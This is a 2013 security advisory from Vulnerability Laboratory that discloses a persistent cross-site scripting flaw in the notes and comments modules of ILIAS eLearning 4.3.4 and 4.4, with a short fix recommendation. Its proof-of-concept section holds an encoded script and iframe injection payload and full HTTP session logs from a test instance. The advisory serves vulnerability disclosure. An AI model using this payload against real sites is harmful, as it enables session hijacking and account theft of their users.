扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 |
Document Title: =============== ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1122 Release Date: ============= 2013-10-27 Vulnerability Laboratory ID (VL-ID): ==================================== 1122 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== ILIAS is a web base learning management system (LMS, VLE). Features: Courses, SCORM 1.2 and 2004, mail, forum, chat, groups, podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, role based access. (Copy of the Homepage: http://sourceforge.net/projects/ilias/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application. Vulnerability Disclosure Timeline: ================================== 2013-10-27:Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ILIAS Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability is detected in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application. The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application side). The persistent web vulnerability is located in the <code>Notes & Comments</code> module. Remote attackers are able to inject own malicious script code via POST method request in the vulnerable comment or note parameters. The execute occurs in the in the comments and private notes modules of the admin panel. Exploitation of the persistent web vulnerability requires low user interaction and a low privileged web-application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or persistent module context manipulation. Request Method(s): [+] POST Vulnerable Module(s): [+] Notes [+] Comments Vulnerable Parameter(s): [+] note Affected Module(s): [+] Private Notes [+] Comments Review Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low user interaction and low privileged web-application user account. For demonstration or to reproduce ... PoC: Public Comments & private Notes <div class="ilNote"> <a name="note_35"><!-- <img src="https://www.exploit-db.com/exploits/29265/templates/default/images/note_unlabeled.png" alt="Note" title="Note" border="0" style="vertical-align:text-bottom; margin-bottom:2px;"/> --></a> <span class="small light"> Last edited on 26. Oct 2013</span> <div class="ilNoteText"><h4 class="ilNoteTitle"></h4>><%20%20"<[PERSISTENT INJECTED SCRIPT CODE!]"> </div></div> --- PoC Session Logs --- Status: 302[Found] POST http://ilias.localhost:8080/ilias.php? note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b Load Flags[LOAD_DOCUMENT_URILOAD_INITIAL_DOCUMENT_URI] Content Size[20] Mime Type[text/html] Request Headers: Host[ilias.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://ilias.localhost:8080/ilias.php?note_type=1�e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI] Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive] Post Data: note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E %22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28 document.cookie%29%3C%2Fscript%3E%40gmail.com] cmd%5BupdateNote%5D[Update+Note] note_id[35] Response Headers: Date[Sat, 26 Oct 2013 21:12:44 GMT] Server[Apache/2.2.22 (Ubuntu)] X-Powered-By[PHP/5.3.10-1ubuntu3.8] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Content-Type[text/html] Status: 200[OK] GET http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top Load Flags[LOAD_DOCUMENT_URILOAD_REPLACELOAD_INITIAL_DOCUMENT_URI] Content Size[4997] Mime Type[text/html] Request Headers: Host[ilias.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://ilias.localhost:8080/ilias.php?note_type=1�e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI] Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive] Response Headers: Date[Sat, 26 Oct 2013 21:12:44 GMT] Server[Apache/2.2.22 (Ubuntu)] X-Powered-By[PHP/5.3.10-1ubuntu3.8] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] P3P[CP="CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT STA PRE"] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[4997] Keep-Alive[timeout=5, max=99] Connection[Keep-Alive] Content-Type[text/html; charset=UTF-8] Reference(s): ilias.localhost:8080/ilias.php?baseClass=ilPersonalDesktopGUI&cmd=jumpToSelectedItems ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=x Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the note input field. Recognize also the affected output section were the vulnerable value executes. Security Risk: ============== The security risk of the persistent input validation web vulnerability is estimated as medium(+). Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright � 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com |
体验盒子
